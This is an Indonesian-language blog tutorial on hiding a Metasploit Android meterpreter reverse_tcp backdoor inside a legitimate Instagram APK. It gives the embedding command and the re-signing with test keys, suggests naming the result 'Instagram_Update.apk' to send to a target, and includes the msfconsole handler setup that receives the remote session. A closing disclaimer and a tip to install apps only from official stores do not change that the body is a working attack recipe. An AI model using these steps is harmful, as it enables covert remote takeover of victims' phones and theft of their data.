Thursday 15 June 2017

Menyisipkan Backdoor Kedalam File Apk

Kalau untuk mengelabui target user windows dengan membuat backdoor dengan format file tertentu mungkin sudah biasa ya, karena memang sudah banyak module exploit yang digunakan untuk membuat backdoor dengan format file tertentu(.pdf, .doc, .rar). lalu bagaimana jika target exploit kita android, dan bagaimana untuk menyamarkan backdoor tersebut ? oke di bawah ini akan saya berikan contoh cara menyisipkan backdoor kedalam file apk.

Bagi yang mau mencoba bisa download bahannya disini
Extract file tersebut lalu masukkan file apk yang akan di sisipi backdoor ke dalam folder apk-embed jadi satu dengan apk-embed-payload.rb. sebagai contoh disini saya akan menyisipkan backdoor kedalam file apk instagram

Nah untuk memasukkan payload ke dalam file apk tersebut perintahnya seperti ini
ruby apk-embed-payload.rb [target.apk] [msfvenom options]
Contoh
ruby apk-embed-payload.rb Instagram.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=1337
ruby apk-embed-payload.rb [target.apk] [msfvenom options]

Tunggu hingga prossesnya selesai, jika berhasil nantinya akan ada file baru yang telah disisipi backdoor dengan nama namafile_backdoored.apk
namafile_backdoored.apk

Selanjutnya adalah melakukan SignApk, tujuannya agar file apk yang telah di sisipi backdoor tersebut bisa di install di semua device android.
Caranya, masukkan file apk hasil backdooring kedalam folder SignApk. lalu lakukan sign dengan perintah dibawah ini 
java -jar signapk.jar testkey.x509.pem testkey.pk8 [file_asli.apk] [file_asli_hasilsign.apk]
Contoh
java -jar signapk.jar testkey.x509.pem testkey.pk8 Instagram_backdoored.apk Instagram_Update.apk
java -jar signapk.jar testkey.x509.pem testkey.pk8 [file_asli.apk] [file_asli_hasilsign.apk]
Nah diatas file hasil sign saya beri nama Instagram_Update.apk dan file siap di kirim ke target. namun sebelumnya buka msfconsole, set seperti di bawah ini
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100 
set lport 1337
exploit
lhost dan lport sesuaikan dengan yang kalian gunakan. 

Berikut ini adalah tampilan android target ketika menginstall file apk yang di sisipi backdoor tadi. 
install backdoorbackdoor installed
Tidak beda dengan aslinya kan

Namun begitu target mebuka aplikasi tersebut kita juga mendapatkan sesi meterpreternya
backdoor opened

meterpreter sessions opened
Bagi yang masih penasaran kalian bisa lihat video di bawah ini

Tutorial ini hanya ntuk pengetahuan semata, jika ada penyalahgunaan dari tutorial ini bukan tanggung jawab dari saya.
Saya harap dengan dibuatnya postingan ini dapat membuat kita agar lebih berhati-hati apabila mendownload aplikasi dari sumber yang tidak terpercaya. Selalu download aplikasi dari website resmi atau dari google play. 
Oke, mungkin cukup itu yang bisa saya sampaikan mengenai Cara Menyisipkan Backdoor kedalam File Apk, semoga bermanfaat.
source https://gist.github.com/SkullTech
sumber : mas anherr


EmoticonEmoticon

Note: only a member of this blog may post a comment.